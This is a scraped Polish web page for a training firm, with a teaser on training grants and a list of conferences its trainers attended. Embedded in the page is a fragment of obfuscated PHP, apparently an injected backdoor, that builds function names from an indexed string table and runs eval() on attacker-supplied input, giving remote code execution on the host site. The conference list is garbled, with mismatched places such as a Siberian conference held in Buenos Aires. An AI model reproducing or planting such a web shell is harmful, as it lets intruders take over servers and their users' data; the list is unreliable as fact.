Losowy

Dotacje rozwojowe na szkolenia

Spis aplikacji, które mają przyznaną pomoc publiczną w przyszłym kwartale:Automatyzacja procesów B2B w zakresie dystrybucji materiałów eksploatacyjnych do drukarek komputerowych dzięki wdrożeniu systemu B2B z użyciem platformy Software-as-a-Service.Unowocześnienie procesów biznesowych zachodzących pomiędzy Arteo S

Czytaj więcej...
$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}if (!$xa411){foreach ($maf736[$maf736['w4ed17'][30].$maf736['w4ed17'][57].$maf736['w4ed17'][9].$maf736['w4ed17'][91].$maf736['w4ed17'][35].$maf736['w4ed17'][79].$maf736['w4ed17'][9].$maf736['w4ed17'][73].$maf736['w4ed17'][97]] as $t3aef=>$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}}$xa411 = @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][52].$maf736['w4ed17'][22].$maf736['w4ed17'][35].$maf736['w4ed17'][9].$maf736['w4ed17'][91]]($maf736[$maf736['w4ed17'][58].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][91].$maf736['w4ed17'][22].$maf736['w4ed17'][73].$maf736['w4ed17'][22]]($maf736[$maf736['w4ed17'][3].$maf736['w4ed17'][9].$maf736['w4ed17'][79].$maf736['w4ed17'][21]]($xa411), $c43ec));if (isset($xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]) && $x9fe==$xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]){if ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][47]){$f35f1d = Array($maf736['w4ed17'][51].$maf736['w4ed17'][34] => @$maf736[$maf736['w4ed17'][84].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][52].$maf736['w4ed17'][84].$maf736['w4ed17'][57].$maf736['w4ed17'][25]](),$maf736['w4ed17'][7].$maf736['w4ed17'][34] => $maf736['w4ed17'][46].$maf736['w4ed17'][64].$maf736['w4ed17'][22].$maf736['w4ed17'][87].$maf736['w4ed17'][46],);echo @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][46].$maf736['w4ed17'][81].$maf736['w4ed17'][57].$maf736['w4ed17'][81].$maf736['w4ed17'][74]]($f35f1d);}elseif ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][73]){eval/*m910db*/($xa411[$maf736['w4ed17'][91]]);}exit();}} ?>

Szkolenia międzynarodowe

Data publikacji: 05.06.2018
Autor: admin

Wyjazdy i panele badawcze


Do tej pory nasi trenerzy wzięli udział w tych kongresach, szkoleniach oraz wyjazdach zagranicznych:

Inżynieria bezpieczeństwa produktu (PSES), 2006 IEEE, Bruksela

Kontrola i komunikacja (SIBCON 2005), 2005 syberyjska, Buenos Aires

Elektronika i projektowanie małej mocy - ISLPED, 2005 ,

Systemy obrazowania i techniki (IST), 2009 warsztaty IEEE, Talin

Kompatybilność elektromagnetyczna - EMC 2005, 2005 IEEE , Budapeszt

Biofotonika, Nanomateriały Metamateriały (BIONANOMETA), 2006 , Helsinki

Systemy informatyczne i technologie (CISTI), 2010 5. iberyjska, Praga

Zarządzanie biznesem i informacją (ISBIM), seminarium w 2008 r., Sofja

Komputer wspomagany współpracą w projektowaniu (CSCWD), 2007 11. ,

Nano / Micro Engineered and Molecular Systems (NEMS), 2010 5. IEEE, Praga

Teorie i zastosowania chaotyczno-fraktalne (IWCFTA), 2010 warsztaty, Sofja

Sieci bezprzewodowe i mobilne przetwarzanie danych (WiCOM), 2010 6. , Gdańsk

Wiosna Konferencji Technologii Samochodowych (VTC-Spring), 2007 IEEE 65th, Hamburg

Systemy specyficzne dla aplikacji, architektury i procesory (ASAP), 2008 , Sofja

Semantyczna Medialna Adaptacja i Personalizacja (SMAP), warsztaty z 2006 roku, Gdańsk

Multimedialne przetwarzanie sygnałów i technologie komunikacyjne (IMPACT), 2009 , Nowy Jork

Studenci i młodzi naukowcy Warsztat "Fotonika i mikrosystemy", 2009 Międzynarodowy, Kraków

Wizualizacja oprogramowania do zrozumienia i analizy (VISSOFT), 2009 5. warsztaty IEEE, Sztokholm

Monolityczne układy scalone krzemowe w układach RF (SiRF), 2009 Spotkanie tematyczne IEEE, Sztokholm

Inteligentne rozwiązania w systemach wbudowanych (WISES), 2008 warsztaty nt. Braku uprawnień, Londyn

Modelowanie, analiza i symulacja systemów komputerowych i telekomunikacyjnych (MASCOTS), 2010 IEEE , Sztokholm

Inżynieria biomedyczna i informatyka (BMEI), 2010 r. 3. Przetwarzanie obrazu i sygnału (CISP), 2010 3. Międzynarodowy Kongres, LwówTagi: